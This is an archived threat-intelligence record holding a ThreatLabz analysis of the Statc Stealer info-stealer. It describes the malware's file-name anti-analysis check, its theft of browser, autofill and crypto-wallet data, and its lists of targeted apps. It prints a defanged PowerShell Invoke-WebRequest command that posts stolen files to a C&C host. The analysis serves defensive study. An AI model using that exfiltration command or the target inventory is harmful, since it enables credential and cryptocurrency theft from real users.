{
	"id": "639ef749-25a5-484e-b026-02f22fc5b907",
	"created_at": "2026-04-06T00:14:07.052001Z",
	"updated_at": "2026-04-10T03:21:48.301973Z",
	"deleted_at": null,
	"sha1_hash": "8bc23437d37840db9d813d3bdce160cb4d64673b",
	"title": "Statc Stealer | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2551278,
	"plain_text": "Statc Stealer | ThreatLabz\r\nBy Shivam Sharma, Amandeep Kumar\r\nPublished: 2023-08-08 · Archived: 2026-04-05 21:50:14 UTC\r\nTechnical Analysis\r\nEvasion using anti-analysis techniques\r\nTypically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the victim’s machine.\r\nWe found one anti-analysis technique while analyzing Statc Stealer:\r\nThe sample looks for its original file name\r\nChecks whether its file name is the same as its internal name\r\nStops executing if it finds differences\r\nEssentially, if Statc Stealer discovers that you’ve changed or updated its malicious files, then it stops in its tracks.\r\nThe code example in the image below shows how:\r\nThe sample used a FileName check\r\nThe sample compares the file name with a hardcoded encrypted string\r\nFigure 3: File name comparison code\r\nTheft and exfiltration of data\r\nStealing activity\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 1 of 9\r\nStatc Stealer has a general information stealing capability. 
It’s able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.\r\nUsing the Python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.\r\nThe image below shows various references to “wallets” and “crypto”, indicating that sensitive cryptocurrency information has been compromised.\r\nFigure 4: Decrypted strings using Python script\r\nEncrypted strings\r\nFigure 5: Encrypted strings\r\nDecrypted strings\r\nFigure 6: Decrypted strings\r\nBrowser exfiltration\r\nBrowser exfiltration is the unauthorized transfer of any data from a browser. It can involve social engineering, phishing attacks and emails, and even uploading data to an insecure hard drive.\r\nHowever, Statc Stealer uses its malicious software to drop and execute malicious files. Let’s explore how this works.\r\nHow it works\r\nStatc Stealer employs a straightforward and easily detectable technique to steal browser data. It leverages the Invoke-WebRequest Uniform Resource Identifier (URI) in PowerShell to initiate a process, using the following arguments:\r\nInvoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\\Users\\\r\nThe significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and send it securely to its C\u0026C server. This allows the malware to harvest valuable information, such as login credentials and personal details, for malicious purposes like identity theft and financial fraud. 
Despite its simplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the development of effective countermeasures.\r\nTargeted browsers\r\nThe Statc Stealer malware can exfiltrate data from the following browsers:\r\nChrome\r\nMicrosoft Edge\r\nBrave\r\nOpera\r\nYandex\r\nMozilla Firefox\r\nIt comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows browsers. By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise sensitive data from a larger pool of unsuspecting users.\r\nStealing autofill data\r\nStatc Stealer is also capable of exfiltrating autofill data. If a stealer takes autofill data, login credentials, Personally Identifiable Information (PII) and payment information are at risk:\r\nUsernames and passwords\r\nEmail\r\nCredit card details\r\nPersonal addresses\r\nPayment information\r\nStolen data\r\nFigure 7: Stolen data in decrypted form\r\nData in encrypted form\r\nFigure 8: Stolen data after encryption\r\nIn the images above, Statc Stealer is exfiltrating browsers’ autofill information. From here, the malware will encrypt the stolen data and store it in a text file in the Temp folder.\r\nProcess Monitor (ProcMon)\r\nProcess Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. 
It can help provide a snapshot into the types of sensitive information Statc Stealer is capable of stealing.\r\nUsing ProcMon, we observed that Statc Stealer steals:\r\nuser’s cookies data\r\nweb data\r\nlocal state\r\ndata preferences\r\nlogin data\r\nvarious wallets' information\r\nFileZilla\r\nbrowsers' autofills\r\nAnyDesk\r\nronin_edge\r\nMetaMask\r\nTelegram data\r\nWe captured this malicious activity in ProcMon in the image below.\r\nFigure 9: Browser related data shown in ProcMon\r\nWallet data\r\nStatc Stealer can exfiltrate data from various wallets, like:\r\nCryptocom-Wallet\r\nPetra-aptos-wallet\r\nexodus-web3-wallet\r\nbitkeep-crypto-nft-wallet\r\nliquality-wallet\r\nethos-sui-wallet\r\nsuite-sui-wallet\r\ntallsman-polkadot-wallet\r\nEnkrypt-ethereum-polkadot\r\nleap-cosmos-wallet\r\npontem-aptos-wallet\r\nfewcha-move-wallet\r\nrise-aptos-wallet\r\nteleport-wallet\r\nmartin-wallet-aptos-sui\r\navana-wallet-solana-wallet\r\nglow-solana-wallet-beta\r\nsolflare-wallet\r\nSource: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat"
	],
	"report_names": [
		"statc-stealer-decoding-elusive-malware-threat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434447,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.pdf",
		"text": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.txt",
		"img": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.jpg"
	}
}